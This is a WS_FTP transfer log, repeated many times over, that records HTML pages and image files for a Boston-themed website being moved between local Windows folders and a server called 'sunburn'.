10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
